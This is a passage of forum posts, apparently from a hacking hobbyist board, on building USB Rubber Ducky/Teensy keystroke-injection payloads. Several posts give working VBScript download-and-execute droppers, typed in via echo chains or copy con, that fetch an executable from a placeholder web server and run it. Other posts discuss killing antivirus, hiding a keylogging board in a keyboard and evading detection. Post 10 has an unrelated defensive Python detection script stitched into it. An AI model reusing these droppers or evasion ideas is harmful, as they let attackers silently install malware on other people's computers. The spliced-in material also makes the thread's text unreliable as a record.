
AndrewFaulds

Posts posted by AndrewFaulds

  1. I've been playing around with what could be done from the Windows Run window and have the following sample that you guys might be able to build more from.

    1. Open Run window (window-R)

    2. Create a script file (VBScript for this sample) and execute it with the following command:

    cmd /c "echo wscript.echo "hello" > c:\temp\test.vbs && start wscript c:\temp\test.vbs"

    A couple of notes about the command:

    a. cmd /c is used so that the command window will close on completion

    b. I'm using echo to build a text file in some directory (make sure it's a directory that exists and you have rw rights to!)

    c. If you want to build a script with multiple lines, you can just use another echo statement, but be sure to use >> instead of > to append to the script file you're building

    d. && is used to separate the commands

    e. I'm calling the start command instead of wscript directly so that the cmd process doesn't have to wait for the VBScript file to complete before closing the command window

    Not a perfect solution, and certainly not a sophisticated payload in this sample, but I'm sure you guys are more creative than me.

    Sergio

    TOPTIP:

    Use copy con to build scripts instead of echo:

    copy con script.vbs

    blah.blah

    blah.blah.derp

    blah[Ctrl+Z or F6]

  2. That's a great idea. The Rockbox code base is incredibly clean and well organized making it very easy to hack. And you have the added bonus that an MP3 player looks completely innocuous when plugged into a computer. "Hey I need to charge my MP3 player, can I plug it in your USB port?"

    And, disguised as a ducky, with a speaker soldered on, can play the rubber ducky song!

  3. Correction: Nobody bothers to write viruses and by the nature of it being based off of UNIX, it has very few "hacks" because of things like stack protection that help to prevent buffer overflows, etc.

    I know, I was joking.

    The USB duck hack is very unreliable on the Mac due to the fact that very little in OS X is ever in exactly the same place computer to computer (e.g. the dock is at the bottom but can be resized and is centre aligned, so things are never in the same place except on a clean install/user) and that you can't exactly use the menu bar to open apps; you can use Spotlight, but that returns different items depending on what the user uses regularly.

    I'm going to do my best to get around these issues and make the best payloads I can but don't expect this to even work as well as it does on Windows.

    Well, you can always use keyboard shortcuts. Although I doubt Mac OS X is very keyboard friendly.

  4. I ordered 2 Teensys too with a friend of mine, so we could split the postage :)

    That evil volcano ash seems to delay things though, dunno when it will arrive here...

    Got a few ideas ready, just need the hardware to test them out. Also trying to find a place where I can order a PCB for that extremely small version I posted about. No luck yet, every place just seems to have a minimum of 1000 to order :D

    Those teensy tiny particles of silica from the volcano are stopping your Teensy.

  5. Ah yes,

    Thanks for bringing that up.

    On that note, do you know if that would affect the use of it as development?

    And also would there be a way to change that?

    (remove the Arduino from the board and load a library or something)

    It makes it entirely useless.

    That's how it "would affect the use of it as development".

    As the serial converter chip, well, it appears as a serial COM port, and you need custom drivers for it.

    If this was a MIDI Ducky, it'd be handy. But not for anything we want.

    Perhaps the Arduino could do USB, with a custom USB port hooked up to the pins, but I somehow doubt if the Arduino's Serial IO mode is fast enough.

  6. Then what about this?

    When a vbs script is activated the command prompt is immediately back. It doesn't wait for it to finish, so I think that the code from the first post won't work properly with bigger files.

    So why not let the VBS execute the file? It's only 3 lines.

    Dim DataBin 
    Dim HTTPGET 
    Set HTTPGET = CreateObject("Microsoft.XMLHTTP") 
    HTTPGET.Open "GET", "http://www.domain.com/file.exe", False 
    HTTPGET.Send 
    DataBin = HTTPGET.ResponseBody 
    Const adTypeBinary=1 
    Const adSaveCreateOverWrite=2 
    Dim test1 
    Set test1 = CreateObject("ADODB.Stream") 
    test1.Type = adTypeBinary 
    test1.Open 
    test1.Write DataBin 
    test1.SaveToFile "file.exe", adSaveCreateOverWrite
    Set shell = CreateObject("WScript.Shell")
    shell.Run Chr(34) & "file.exe" & Chr(34), 1, false
    

    And also you can put all the echos in 1 string, so the waiting time is less than having to wait till the prompt comes back up again.

    it will look something like this:

    echo Dim DataBin>dl.vbs && echo Dim HTTPGET>>dl.vbs && echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP")>>dl.vbs && echo HTTPGET.Open "GET", "http://YOURWEBSErVER/test.exe", False>>dl.vbs && echo HTTPGET.Send>>dl.vbs && echo DataBin = HTTPGET.ResponseBody>>dl.vbs && echo Const adTypeBinary=1 >>dl.vbs && echo Const adSaveCreateOverWrite=2 >>dl.vbs && echo Dim test1>>dl.vbs && echo Set test1 = CreateObject("ADODB.Stream")>>dl.vbs && echo test1.Type = adTypeBinary>>dl.vbs && echo test1.Open>>dl.vbs && echo test1.Write DataBin>>dl.vbs && echo test1.SaveToFile "file.exe", adSaveCreateOverWrite>>dl.vbs && echo Set shell = CreateObject("WScript.Shell")>>dl.vbs && echo shell.Run Chr(34) ^& "file.exe" ^& Chr(34), 1, false>>dl.vbs

    And then all that is left is to run it and exit CMD:

    promt> dl.vbs

    promt> exit

    I think this is the lowest time possible being at the command prompt. Or someone needs to find a way to shrink the VB script even more! That would be awesome!

    Since I didn't get selected for a dev kit I am thinking of buying my own Teensy. Though a q: I read that Darren is using the original one, but I checked the site and all of their stuff uses mini USB. Any good/simple way for a converter? (buying or self-made is ok)

    cheers!

    Uh....

    You can't have multiple echo commands in a line.

    And as I stated earlier, "echo something >dl.vbs" is less efficient than just copy con.

  7. Something I'm hopefully going to test out is embedding the teensy inside an old white apple keyboard (Because it has huge amounts of space in the back for my crappy soldering.), taking out the USB controller board and running the buttons through the teensy for key logging or activating the payload when conditions are met.

    So, Apple products don't get viruses?

    It seems they get duckies.

  8. Very nice work. Just tested it out by plugging in a random USB mouse. I did run into one small bug. When the program is running, plug in a new device, hit "ctrl+alt+del" then "esc" after the menu comes up. Then unplug the device. The letter "t" on the keyboard will no longer work. Tried it three times to make sure it wasn't me.

    Other than that, great work. Will be running on my colo'd server.

    Oh those weird random-letter-no-longer-works bugs... I HATE THEM

  9. 4. Killing Anti-Virus by mouse click

    This would be very simple after detecting antivirus in use. After the anti-virus is down, possibilities are endless.

    It would be more efficient to do this using keyboard presses, as you can't guarantee window position.

    Windows applications are HIGHLY keyboard accessible. Even the blind can browse animatedgifs.com!

  10. Maybe something like this would work: have the duck load up cmd and type in...

    echo Dim DataBin >dl.vbs
    echo Dim HTTPGET >>dl.vbs
    echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>dl.vbs
    echo HTTPGET.Open "GET", "http://YOURWEBSErVER/test.exe", False>>dl.vbs 
    echo HTTPGET.Send >>dl.vbs
    echo DataBin = HTTPGET.ResponseBody >>dl.vbs
    echo Const adTypeBinary=1 >>dl.vbs
    echo Const adSaveCreateOverWrite=2 >>dl.vbs
    echo Dim test1 >>dl.vbs
    echo Set test1 = CreateObject("ADODB.Stream") >>dl.vbs
    echo test1.Type = adTypeBinary >>dl.vbs
    echo test1.Open >>dl.vbs
    echo test1.Write DataBin >>dl.vbs
    echo test1.SaveToFile "file.exe", adSaveCreateOverWrite >>dl.vbs
    dl.vbs
    file.exe
    exit

    This code will make a VB script that will execute and download a file from a web server. Then you run the file. There are a few anti-virus programs that detect this as bad, but with some changes it will run fine.

    I Will be testing it here soon once my ducky gets here.

    Tell me what you guys think?

    Why the echo commands? copy con is more efficient ;)

    Just do:

    copy con dl.vbs[RETURN]
    Dim HTTPGET[RETURN]
    Set HTTPGET = CreateObject("Microsoft.XMLHTTP")[RETURN]
    HTTPGET.Open "GET", "http://YOURWEBSErVER/test.exe", False[RETURN]
    HTTPGET.Send[RETURN]
    DataBin = HTTPGET.ResponseBody[RETURN]
    Const adTypeBinary=1[RETURN]
    Const adSaveCreateOverWrite=2[RETURN]
    Dim test1[RETURN]
    Set test1 = CreateObject("ADODB.Stream")[RETURN]
    test1.Type = adTypeBinary[RETURN]
    test1.Open[RETURN]
    test1.Write DataBin[RETURN]
    test1.SaveToFile "file.exe", adSaveCreateOverWrite[CTRL+Z]
    file.exe[RETURN]
    exit[RETURN]
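    A defender-side view of the technique discussed in posts 1, 6 and 10 (a script file assembled from redirected echo output and then handed to the Windows Script Host), written here as an added example; it is not code from this thread or from Hak5. It assumes process-creation telemetry that exposes parent image, image and command line (the shape of a Sysmon Event ID 1 record); the event records below are constructed, and the rule names, severities and the hypothetical `analyze` function are the example's own.

```python
import re
from dataclasses import dataclass

# Script extensions that an injected one-liner typically writes out.
SCRIPT_EXT = r"(?:vbs|vbe|js|jse|wsf|bat|cmd|ps1)"

# "echo <text> > file.vbs" or "echo <text> >> file.vbs": a script file being
# assembled from redirected echo output inside a single command line.
ECHO_BUILD = re.compile(
    r"\becho\b[^&|]*?>{1,2}\s*\"?([^\s\"&|]+\." + SCRIPT_EXT + r")\b", re.I)

# A script path handed to the Windows Script Host.
HOST_SCRIPT = re.compile(r"([^\s\"]+\." + SCRIPT_EXT + r")\b", re.I)

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record: parent image, image, command line."""
    parent: str
    image: str
    cmdline: str


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    script: str
    cmdline: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, used to correlate build and launch."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def echo_built_scripts(cmdline: str) -> list[str]:
    """Distinct script files that a command line assembles via echo redirection."""
    seen: list[str] = []
    for target in ECHO_BUILD.findall(cmdline):
        if target not in seen:
            seen.append(target)
    return seen


def analyze(events: list[ProcEvent]) -> list[Finding]:
    """Run three rules over a time-ordered list of process-creation events.

    1. cmd.exe writing a script file with echo redirection   -> medium
    2. wscript/cscript running a script that rule 1 just built -> high
    3. wscript/cscript spawned from cmd.exe with any script   -> low
    """
    findings: list[Finding] = []
    built: set[str] = set()  # basenames of scripts assembled by echo so far
    for ev in events:
        image = ev.image.lower()
        if image == "cmd.exe":
            for target in echo_built_scripts(ev.cmdline):
                built.add(basename(target))
                findings.append(Finding("script-built-via-echo", "medium", target, ev.cmdline))
        elif image in SCRIPT_HOSTS:
            for script in HOST_SCRIPT.findall(ev.cmdline):
                if basename(script) in built:
                    findings.append(Finding("echo-built-script-executed", "high", script, ev.cmdline))
                elif ev.parent.lower() == "cmd.exe":
                    findings.append(Finding("script-host-from-cmd", "low", script, ev.cmdline))
    return findings


# Constructed sample events (not taken from any real host). The first two mirror the
# Run-dialog one-liner from post 1; the next two mirror the echo chain from post 6.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "cmd.exe",
              r'cmd /c "echo wscript.echo "hello" > c:\temp\test.vbs && start wscript c:\temp\test.vbs"'),
    ProcEvent("cmd.exe", "wscript.exe", r"wscript c:\temp\test.vbs"),
    ProcEvent("explorer.exe", "cmd.exe",
              'cmd /c echo Dim DataBin>dl.vbs && echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP")>>dl.vbs'),
    ProcEvent("cmd.exe", "wscript.exe", "wscript dl.vbs"),
    ProcEvent("cmd.exe", "wscript.exe", r"wscript //nologo c:\scripts\maint.vbs"),  # benign-looking, low only
    ProcEvent("explorer.exe", "cmd.exe", "cmd /c echo build finished > build.log"),  # not a script: ignored
    ProcEvent("explorer.exe", "notepad.exe", "notepad notes.txt"),
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.severity:6}] {f.rule:28} {f.script}")
```

    The caveat that matters for the copy con variant: `copy con` and `echo` typed into an already-open cmd window are cmd builtins and create no process of their own, so process-creation telemetry only sees the `cmd /c` one-liner from the Run dialog and the later `wscript.exe` launch. Catching a script built interactively needs file-creation events on script extensions (Sysmon Event ID 11 style) or script-host command lines, which is why rule 3 is kept even at low severity.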

  11. In regard to disconnecting the ducky, great idea, good that you thought of that!

    I don't think copy con will work if the antivirus running (if not killed as discussed in another thread) has an instant scanning feature that scans the contents of currently modified files.

    Seb

    Well, yes, but bear in mind most virus scanners won't know the exploit (assuming a new one), plus Ducky can create a different version every time with some crafty code.

  12. USB hub with your ducky and a flashdrive maybe?

    I'm looking for more 'creative' solutions, basically I'd like everything done as Keyboard input (if I have a choice :)

    What I've just thought of would be using "copy con" to construct a script, e.g.

    [WinKey+R]
    cmd
    [Enter]
    copy con quack.vbs[Enter]
    object = someobject[Enter]
    object.dosomething[Enter]
    end[CTRL+Z]
    quack.vbs[Enter]

    Also one more idea: Make the ducky disconnect after delivering a payload, making it harder to detect.

  13. In the USB Rubber Ducky Part 1 video, Darren says that you could potentially upload an executable payload from the HID.

    How would you do this?

    As even the smallest 10KB payload would take a long time to "type" into the PC, even automatically.

    As mentioned elsewhere in this forum, with no delay, max speed would be around 500 chr/s. Now, uploading a binary via keystrokes would be slow, as binaries would have to be simulated as Alt+XXX key combinations to make it possible to enter the full range of 8-bit values. As a result, this 500 chr/s would become around 150 chr/s with no delay. At a rate of 150 bps, a 10KB (10240B) payload would take around 70 seconds to upload. That's way over a minute, and very inefficient.

    Emulating a USB Flash Drive might work, but then the exploit could be blocked just as easily as the USB Switchblade.

    Oh and Darren, if you're reading this: 1,1 is 1 pixel away from the very top-left corner of the screen. 0,0 would be correct.
